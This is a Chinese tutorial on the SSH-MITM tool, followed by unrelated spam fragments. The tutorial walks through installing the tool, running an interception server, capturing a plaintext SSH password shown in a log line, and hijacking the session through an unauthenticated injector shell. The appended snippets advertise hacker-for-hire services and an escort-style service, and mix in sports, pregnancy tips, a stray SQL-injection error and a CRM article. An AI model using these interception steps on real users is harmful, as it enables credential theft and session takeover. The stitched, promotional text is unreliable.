SSH-MITM服务器专为安全审计而设计,支持公钥认证、会话劫持和文件篡改等功能。需要注意的是,该工具基于Python语言开发,因此需要在主机设备上安装并配置好Python环境。
在使用任何软件包之前,我们都需要进行正确的安装。如需安装SSH-MITM,我们只需要在设备上打开命令行终端,然后运行下列命令即可:
$ pip install ssh-mitm
SSH-MITM的使用非常简单,如果需要密码认证或会话劫持,只需要开启拦截MITM-SSH服务器即可。打开命令行终端,然后运行下列命令:
$ ssh-mitm --remote-host 192.168.0.x
接下来,我们尝试跟SSH-MITM服务器建立连接。SSH-MITM服务器会监听10022端口:
$ ssh -p 10022 user@proxyserver
此时,我们将会看到凭证信息在日志中输出:
2021-01-01 11:38:26,098 [INFO] ?Client connection established with parameters: Remote Address: 192.168.0.x Port: 22 Username: user Password: supersecret Key: None Agent: None
获取明文凭证信息仅仅只是SSH-MITM的其中一个功能而已,当客户端成功连接之后,SSH-MITM会开启一个新的服务器,并用于会话劫持:
2021-01-01 11:42:43,699 [INFO] ?created injector shell on port 34463. connect with: ssh -p 34463 127.0.0.1
在劫持会话的时候,我们可以选择自己喜欢的SSH客户端。需要注意的是,这个连接不需要任何身份验证:
$ ssh -p 34463 127.0.0.1
建立连接之后,你的会话只会通过最新的响应信息来更新,但是我们仍然可以执行任意命令。
接下来,我们就可以在劫持的会话或原始会话中尝试执行某些命令了。
命令的执行结果将输出显示在两个会话中。
SSH-MITM:【GitHub传送门】
初学黑客用什么软件手机(黑客初学)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业务...
雨人坎普是NBA历史上最好的扣将之一,他是暴力美学的代表人物,多次在篮球场上奉献夸张的扣篮。作为90年代联盟最好的大前锋之一,雨人坎普的职业生涯十分辉煌,还有过和乔丹总决赛对飚的经历,职业生涯也赚到了...
深圳龙华区商务预约联系方式【魏天春】,上海市是一座成功者的集中地,对商业服务女学妹的要求也是较为大的,今日大牌明星商务共享女学妹访梦,年纪北京市 女 28,婚姻生活:单身,文凭:普通高中,气场:深圳龙...
很多父母都想要自己的儿女双全,当有个女儿的时候,就想要自己有个儿子,那么对于怀孕以后想要生个男孩子的心愿是非常强烈的,生男孩生女孩其实也是有一定技巧的,对于想要生男孩的准妈妈来说要注意一些事项哦,下面...
5.检查IP信息:ifconfig(1105, "XPATH syntax error: 'd-y0u-fee1-l1ke-th3-sql1-eng1ne}'")118.186.202.142 - -...
编辑导读:此刻许多B端产物雇用要求有从0到1的建树经验,可是当我们有时机主导一款全新的产物时,应该如何从容地完成从0到1的进程呢?本文作者正好从0到1主导设计过一款CRM销售进程打点产物,但愿通过项目...